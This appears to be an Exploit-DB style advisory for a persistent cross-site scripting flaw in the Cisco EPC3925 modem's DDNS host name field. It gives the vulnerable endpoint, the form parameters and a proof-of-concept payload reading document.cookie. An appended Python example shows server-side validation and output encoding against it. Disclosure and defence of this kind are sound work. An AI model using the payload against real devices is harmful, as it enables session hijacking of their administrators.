vendor: EPC3925
by: Jeroen - IT Nerdbox
N/A
CVSS
N/A
Persistent Cross Site Scripting
Unknown
CWE
Product Name: EPC3925
Affected Version From: epc3925-E10-5-v302r125572-130520c
Affected Version To: epc3925-E10-5-v302r125572-130520c
Patch Exists: NO
Related CWE:
CPE: cpe:2.3:h:cisco:epc3925:epc3925-E10-5-v302r125572-130520c:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested: Cisco EPC3925
2013

Cisco EPC3925 – Persistent Cross Site Scripting

The DdnsHostName parameter is vulnerable to persistent cross-site scripting. The form applies client-side input validation, but it can easily be bypassed.

Mitigation:

Unknown

Exploit-DB raw data:

#######################################################################
# Exploit Title: Cisco EPC3925 - Persistent Cross Site Scripting
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925
# CVE: N/A
#######################################################################
# Description
# The parameter DdnsHostName is vulnerable to Persistent Cross Site Scripting.
# However, there is client side input validation, which can easily be bypassed.
#
# Location:
#
# POST http://[target]/goform/Setup_DDNS
#
# Parameters:
#
#DdnsService=0&DdnsUserName=xxx&DdnsPassword=****&DdnsHostName=<Enter Payload Here>&save=Save+Settings
#
# Payload
#
# PoC: "><input onmouseover=prompt(document.cookie)>
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-persistent-xss/
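
A server-side counterpart to the client-side validation described above, added here as an example that is not part of the original advisory or of the device firmware: it checks DdnsHostName against hostname syntax before storing it and HTML-encodes it on output. The function names, the sample host name, and the assumption that the stored value is rendered into an input's value attribute are hypothetical.

```python
import html
import re
from urllib.parse import parse_qs, urlencode

# One DNS label: 1-63 letters, digits or hyphens, no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_hostname(value):
    """Server-side allow-list check for a DDNS host name."""
    if not value or len(value) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.split("."))


def handle_setup_ddns(body):
    """Hypothetical handler for a Setup_DDNS form body.

    Returns (HTTP status, value to store). The check runs on the server,
    so a request sent without the browser-side script is still rejected.
    """
    fields = parse_qs(body, keep_blank_values=True)
    host = fields.get("DdnsHostName", [""])[0]
    if not is_valid_hostname(host):
        return 400, ""
    return 200, host


def render_hostname_input(stored):
    """Encode on output as well, so values stored before the check existed stay inert.

    Assumes the page shows the value inside a double-quoted value attribute.
    """
    return '<input type="text" name="DdnsHostName" value="%s">' % html.escape(
        stored, quote=True)


# Constructed sample request bodies using the parameter names from the advisory.
_BASE = {"DdnsService": "0", "DdnsUserName": "xxx", "DdnsPassword": "****",
         "save": "Save Settings"}
POC = '"><input onmouseover=prompt(document.cookie)>'  # PoC string from the advisory
GOOD_BODY = urlencode({**_BASE, "DdnsHostName": "home.example.net"})
POC_BODY = urlencode({**_BASE, "DdnsHostName": POC})

if __name__ == "__main__":
    print(handle_setup_ddns(GOOD_BODY))   # accepted
    print(handle_setup_ddns(POC_BODY))    # rejected
    print(render_hostname_input(POC))     # markup characters encoded
```

Input validation and output encoding are deliberately both present: the first rejects new bad values, the second covers anything already stored.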